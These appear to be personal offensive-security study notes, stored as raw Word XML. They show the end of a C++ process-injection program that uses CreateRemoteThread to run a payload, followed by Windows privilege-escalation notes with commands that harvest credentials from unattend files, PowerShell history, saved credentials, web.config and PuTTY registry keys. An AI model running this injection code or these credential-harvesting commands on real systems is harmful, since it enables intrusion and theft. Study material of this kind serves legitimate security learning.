      </w:r>
    </w:p>
    <w:p w14:paraId="2BE39A74"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A92A0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out &lt;&lt; "[+] Wrote " &lt;&lt; bytesWritten &lt;&lt; " bytes to remote process." &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD6EB5" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4D09BE"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 4️</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a remote thread to execute the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297B9EC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HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06863F10"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LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E0055"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if (!hThread) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACFAD9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err &lt;&lt; "Failed to create remote thread. Error: " &lt;&lt; GetLastError() &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C429B1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VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243E411"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CloseHandle(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61915AE8"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return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2059645A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206BA405"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std::cout &lt;&lt; "[+] Remote thread created successfully!" &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8006B1"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 Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368D9AF4"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CloseHandle(hThread);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717E56A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CloseHandle(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CE7672"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 xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A2B4FB" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4205B230" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F91AD55" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="004B5F5C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>////////////////////////////////////////////////////////////////////////////////////////////////////</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B3842C" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777A30">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows APIs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE27435" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009"/>
    <w:p w14:paraId="3991087F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009"/>
    <w:p w14:paraId="0BFFB1B4" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009"/>
    <w:p w14:paraId="6B50F764" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009"/>
    <w:p w14:paraId="1C2FAF97" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00900A23" w:rsidRDefault="00C00009" w:rsidP="00C00009"/>
    <w:p w14:paraId="6C6FFBDC" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1E161E" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="004B5F5C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>////////////////////////////////////////////////////////////////////////////////////////////////////</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613B56F3" w14:textId="4AA8832A" w:rsidR="001A128D" w:rsidRDefault="001A128D" w:rsidP="00E60DFD"/>
    <w:p w14:paraId="74CAA530" w14:textId="77777777" w:rsidR="004B5F5C" w:rsidRDefault="004B5F5C" w:rsidP="004B5F5C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7D0AF6" w14:textId="4AF25484" w:rsidR="00E60DFD" w:rsidRPr="004B5F5C" w:rsidRDefault="004B5F5C" w:rsidP="004B5F5C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>////////////////////////////////////////////////////////////////////////////////////////////////////</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FB96F4" w14:textId="77777777" w:rsidR="00CD4707" w:rsidRDefault="00CD4707" w:rsidP="00CD4707">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>////////////////////////////////////////////////////////////////////////////////////////////////////</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FC55E1" w14:textId="71223182" w:rsidR="0034457E" w:rsidRPr="00CD4707" w:rsidRDefault="00CD4707" w:rsidP="00CD4707">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4707">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4452B8EB" w14:textId="6043A59B" w:rsidR="00E72BD0" w:rsidRDefault="00C8472D" w:rsidP="00C8472D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00C8472D">
        <w:t>Harvesting Passwords from Usual Spots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA547C5" w14:textId="14559D9E" w:rsidR="00E72BD0" w:rsidRPr="00E72BD0" w:rsidRDefault="00E72BD0" w:rsidP="00E72BD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unattended Windows Installations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2491F658" w14:textId="14700F61" w:rsidR="00E72BD0" w:rsidRDefault="00E72BD0" w:rsidP="00E72BD0">
      <w:r w:rsidRPr="00E72BD0">
        <w:t>Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72BD0">
        <w:t>installations as they don't require user interaction.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77292F78" w14:textId="382E0BC8" w:rsidR="00E72BD0" w:rsidRDefault="00E72BD0" w:rsidP="00E72BD0">
      <w:r w:rsidRPr="00E72BD0">
        <w:t>installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7760D862" w14:textId="6CE9F1CF" w:rsidR="00E72BD0" w:rsidRPr="00E72BD0" w:rsidRDefault="00E72BD0" w:rsidP="00E72BD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:lastRenderedPageBreak/>
        <w:t>C:\Unattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A0F4D" w14:textId="77777777" w:rsidR="00E72BD0" w:rsidRPr="00E72BD0" w:rsidRDefault="00E72BD0" w:rsidP="00E72BD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:t>C:\Windows\Panther\Unattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F09E5CB" w14:textId="77777777" w:rsidR="00E72BD0" w:rsidRPr="00E72BD0" w:rsidRDefault="00E72BD0" w:rsidP="00E72BD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:t>C:\Windows\Panther\Unattend\Unattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C1A15E" w14:textId="77777777" w:rsidR="00E72BD0" w:rsidRPr="00E72BD0" w:rsidRDefault="00E72BD0" w:rsidP="00E72BD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:t>C:\Windows\system32\sysprep.inf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44588078" w14:textId="77777777" w:rsidR="00E72BD0" w:rsidRPr="00E72BD0" w:rsidRDefault="00E72BD0" w:rsidP="00E72BD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:t>C:\Windows\system32\sysprep\sysprep.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43BD89" w14:textId="124555F6" w:rsidR="00E72BD0" w:rsidRDefault="00E72BD0" w:rsidP="00E72BD0"/>
    <w:p w14:paraId="34CE5481" w14:textId="2F5FA435" w:rsidR="00E72BD0" w:rsidRDefault="00E72BD0" w:rsidP="00E72BD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED52E11" w14:textId="15289FC6" w:rsidR="00E72BD0" w:rsidRPr="00E72BD0" w:rsidRDefault="00D3539D" w:rsidP="0035510D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00E72BD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>md</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E72BD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DB0FC7" w14:textId="77777777" w:rsidR="00E72BD0" w:rsidRPr="00E72BD0" w:rsidRDefault="00E72BD0" w:rsidP="0035510D">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:t>type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AEFEAD" w14:textId="7C5BCE67" w:rsidR="00D3539D" w:rsidRDefault="00E72BD0" w:rsidP="0035510D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:t xml:space="preserve">To read the file from </w:t>
      </w:r>
      <w:r w:rsidR="00D3539D" w:rsidRPr="00E72BD0">
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidR="00D3539D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3539D" w:rsidRPr="00D3539D">
        <w:t>replace </w:t>
      </w:r>
      <w:r w:rsidR="00D3539D" w:rsidRPr="00D3539D">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D3539D" w:rsidRPr="00D3539D">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>userprofile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D3539D" w:rsidRPr="00D3539D">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidR="00D3539D" w:rsidRPr="00D3539D">
        <w:t> with </w:t>
      </w:r>
      <w:r w:rsidR="00D3539D" w:rsidRPr="00D3539D">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D3539D" w:rsidRPr="00D3539D">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>Env:userprofile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E72BD0">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BAC268" w14:textId="1C13C0D5" w:rsidR="00D3539D" w:rsidRDefault="0035510D" w:rsidP="0035510D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035510D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PSReadline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035510D">
        <w:t xml:space="preserve"> PowerShell module that enhances the command-line editing experience in PowerShell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and maintains the History</w:t>
      </w:r>
      <w:r w:rsidRPr="0035510D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6036514A" w14:textId="2569C3B2" w:rsidR="00D3539D" w:rsidRPr="0035510D" w:rsidRDefault="0035510D" w:rsidP="0035510D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0035510D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035510D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>userprofile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035510D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035510D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035510D">
        <w:t>environment variable points to the current user's profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F4627D" w14:textId="77777777" w:rsidR="0035510D" w:rsidRDefault="0035510D" w:rsidP="00D3539D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637E781D" w14:textId="11733B3E" w:rsidR="00D3539D" w:rsidRPr="0035510D" w:rsidRDefault="00D3539D" w:rsidP="0035510D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3539D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Saved Windows Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028337AF" w14:textId="42525332" w:rsidR="00D3539D" w:rsidRDefault="00D3539D" w:rsidP="0035510D">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk192453940"/>
      <w:r w:rsidRPr="00D3539D">
        <w:t>cmdkey /list</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6032CDD7" w14:textId="6B4E8D16" w:rsidR="00D3539D" w:rsidRDefault="00D3539D" w:rsidP="0035510D">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D3539D">
        <w:t>runas /savecred /user:admin cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C2D01" w14:textId="738A0BC8" w:rsidR="00D3539D" w:rsidRDefault="00D3539D" w:rsidP="0035510D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3539D">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/savecred </w:t>
      </w:r>
      <w:r w:rsidRPr="00D3539D">
        <w:t xml:space="preserve">option stores the password, so you don't need to enter it each time you run a command with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D3539D">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>runas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A006FCD" w14:textId="77777777" w:rsidR="00D3539D" w:rsidRDefault="00D3539D" w:rsidP="00D3539D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8523B4" w14:textId="77777777" w:rsidR="00D3539D" w:rsidRPr="00D3539D" w:rsidRDefault="00D3539D" w:rsidP="00D3539D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3539D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IIS Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE9418" w14:textId="750FCD59" w:rsidR="00D3539D" w:rsidRDefault="00D3539D" w:rsidP="0035510D">
      <w:r w:rsidRPr="00D3539D">
        <w:t>Internet Information Services (IIS) is the default web server on Windows installations</w:t>
      </w:r>
      <w:r w:rsidR="000B04B3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6096EAC7" w14:textId="6BCE4AA5" w:rsidR="000B04B3" w:rsidRDefault="000B04B3" w:rsidP="0035510D">
      <w:r w:rsidRPr="000B04B3">
        <w:t>The configuration of websites on IIS is stored in a file called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B04B3">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        </w:rPr>
        <w:t>web.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B04B3">
        <w:t> and can store passwords for databases or configured authentication mechanisms.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B04B3">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>Web.config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B18855" w14:textId="77777777" w:rsidR="000B04B3" w:rsidRPr="000B04B3" w:rsidRDefault="000B04B3" w:rsidP="0035510D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B04B3">
        <w:t>C:\inetpub\wwwroot\web.config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC80861" w14:textId="77777777" w:rsidR="000B04B3" w:rsidRPr="000B04B3" w:rsidRDefault="000B04B3" w:rsidP="0035510D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B04B3">
        <w:t>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4425E937" w14:textId="77777777" w:rsidR="000B04B3" w:rsidRPr="000B04B3" w:rsidRDefault="000B04B3" w:rsidP="0035510D">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000B04B3">
        <w:rPr>
          <w:rStyle w:val="token"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086534B2" w14:textId="77777777" w:rsidR="000B04B3" w:rsidRDefault="000B04B3" w:rsidP="000B04B3"/>
    <w:p w14:paraId="37FFD0D9" w14:textId="3AFFF4F5" w:rsidR="000B04B3" w:rsidRPr="000B04B3" w:rsidRDefault="000B04B3" w:rsidP="000B04B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B04B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retrieve Credentials from Software: PuTTY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B29246" w14:textId="67DC7B90" w:rsidR="00D3539D" w:rsidRDefault="004B368C" w:rsidP="004B368C">
      <w:r w:rsidRPr="004B368C">
        <w:t>PuTTY is an SSH client commonly found on Windows systems</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004B368C">
        <w:t xml:space="preserve">IP and other configurations can be stored for later use. While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include </w:t>
      </w:r>
      <w:r w:rsidRPr="004B368C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cleartext authentication credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="004B368C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CE1902" w14:textId="0DF0DACF" w:rsidR="00D3539D" w:rsidRDefault="004B368C" w:rsidP="004B368C">
      <w:r w:rsidRPr="004B368C">
        <w:t xml:space="preserve">To retrieve the stored proxy credentials, search under the following registry key for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B368C">
        <w:t>ProxyPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10939BBD" w14:textId="77777777" w:rsidR="004B368C" w:rsidRPr="004B368C" w:rsidRDefault="004B368C" w:rsidP="004B368C">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B368C">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606000C7" w14:textId="77777777" w:rsidR="004B368C" w:rsidRDefault="004B368C" w:rsidP="004B368C"/>
    <w:p w14:paraId="1932FB1F" w14:textId="77777777" w:rsidR="001050F1" w:rsidRDefault="001050F1" w:rsidP="004B368C"/>
    <w:p w14:paraId="34F32E4C" w14:textId="75DEE5F3" w:rsidR="001050F1" w:rsidRDefault="001050F1" w:rsidP="001050F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001050F1">
        <w:t>Other Quick Wins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5111A6" w14:textId="77777777" w:rsidR="001050F1" w:rsidRPr="001050F1" w:rsidRDefault="001050F1" w:rsidP="001050F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scheduled Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601EC5E0" w14:textId="6E325A3C" w:rsidR="001050F1" w:rsidRPr="001050F1" w:rsidRDefault="001050F1" w:rsidP="001050F1">
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="001050F1">
        <w:t xml:space="preserve">ay </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">there is </w:t>
      </w:r>
      <w:r w:rsidRPr="001050F1">
        <w:t xml:space="preserve">a scheduled task that either </w:t>
      </w:r>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lost its binary</w:t>
      </w:r>
      <w:r w:rsidRPr="001050F1">
        <w:t xml:space="preserve"> or it's using a </w:t>
      </w:r>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">binary can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>modif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ied</w:t>
      </w:r>
      <w:r w:rsidRPr="001050F1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A0189" w14:textId="77777777" w:rsidR="001050F1" w:rsidRPr="001050F1" w:rsidRDefault="001050F1" w:rsidP="001050F1">
      <w:r w:rsidRPr="001050F1">
        <w:t>Scheduled tasks can be listed from the command line using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>schtasks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001050F1">
        <w:t> </w:t>
      </w:r>
    </w:p>
